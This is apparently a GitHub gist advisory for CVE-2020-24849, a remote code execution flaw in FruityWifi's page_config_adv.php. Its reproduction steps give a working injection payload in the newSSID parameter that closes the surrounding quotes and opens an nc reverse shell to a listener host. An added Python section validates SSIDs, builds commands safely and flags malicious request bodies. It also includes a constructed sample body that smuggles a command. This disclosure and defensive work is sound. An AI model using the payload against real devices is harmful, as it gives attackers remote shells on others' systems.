@harsh-bothra
Last active November 3, 2020 09:20
CVE-2020-24849 - FruityWifi Remote Code Execution
Product: FruityWifi
CVE: CVE-2020-24849
Version: through 2.4 (tested on version 2.4)
Vulnerability: Remote Code Execution
Vulnerability Description: A remote code execution vulnerability is identified in FruityWifi through 2.4. Because shell metacharacters obtained from the POST request to the page_config_adv.php page are improperly escaped, an authenticated attacker can achieve remote code execution. This is similar to CVE-2018-17317.
# Steps to Reproduce:
1. Login with credentials to the application.
2. Go to "https://vuln_ip/scripts/page_config_adv.php".
3. Intercept the request then change request method to POST.
4. Add "newSSID" parameter in POST body and insert payload (newSSID=A\"B'C";rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.56.1+4441+>/tmp/f;#) and start nc listener on 4441 port.
Note: In order to bypass the quoting, the injected value first has to close the surrounding quotes and only then carry the payload. Send the request and you will be greeted with a shell.
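The root cause described above is a POST parameter (newSSID) reaching a shell command without escaping. The following is an added example, not FruityWifi's code, showing the two defences a maintainer would apply and a check a defender can run over request bodies: an allow-list validator for SSID values, argv-style command construction that never passes the value through a shell (with shlex.quote as the equivalent of PHP's escapeshellarg where a shell string is unavoidable), and a scanner that flags bodies whose newSSID carries quote-closing plus shell metacharacters. The hostapd_cli command and the sample POST bodies are constructed for illustration.

```python
import re
import shlex
from urllib.parse import parse_qs

# Constructed sample POST bodies (not captured from a real FruityWifi instance).
SAMPLE_BODIES = [
    "newSSID=HomeNetwork",
    "newSSID=Caf%C3%A9%20Guest",
    "newSSID=A%22B%27C%22%3Bid%3B%23",   # closes the quotes, then ';' separates a command
]

# Characters that change meaning inside a POSIX shell command line.
SHELL_META = re.compile(r"""[;&|`$<>\\'"\n]|\$\(""")


def is_valid_ssid(ssid: str) -> bool:
    """Allow-list check: 1..32 bytes of UTF-8, no control characters, no shell metacharacters.

    An 802.11 SSID is at most 32 octets; rejecting metacharacters outright is stricter than
    escaping and is what a configuration page should do before the value goes anywhere.
    """
    data = ssid.encode("utf-8")
    if not 1 <= len(data) <= 32:
        return False
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in ssid):
        return False
    return SHELL_META.search(ssid) is None


def quote_for_shell(ssid: str) -> str:
    """Equivalent of escapeshellarg(): only for code that cannot avoid building a shell string."""
    return shlex.quote(ssid)


def build_command(ssid: str) -> list:
    """Hardened form: the validated value is one argv element, so no shell ever parses it.

    'hostapd_cli set ssid' is a hypothetical stand-in for whatever the page actually invokes.
    """
    if not is_valid_ssid(ssid):
        raise ValueError("rejected SSID")
    return ["hostapd_cli", "set", "ssid", ssid]


def flag_body(body: str) -> dict:
    """Detection helper: decode a POST body and report whether newSSID carries shell metacharacters."""
    params = parse_qs(body, keep_blank_values=True)
    ssid = params.get("newSSID", [""])[0]
    return {
        "ssid": ssid,
        "valid": is_valid_ssid(ssid),
        "metachars": sorted(set(SHELL_META.findall(ssid))),
    }


if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        print(flag_body(body))
```

Run over the constructed bodies, the first two decode to ordinary SSIDs and pass, while the third is rejected with its quote and `;` characters listed; the same flag_body() check can be pointed at a web server's request log or a WAF's body capture to find attempts against this endpoint.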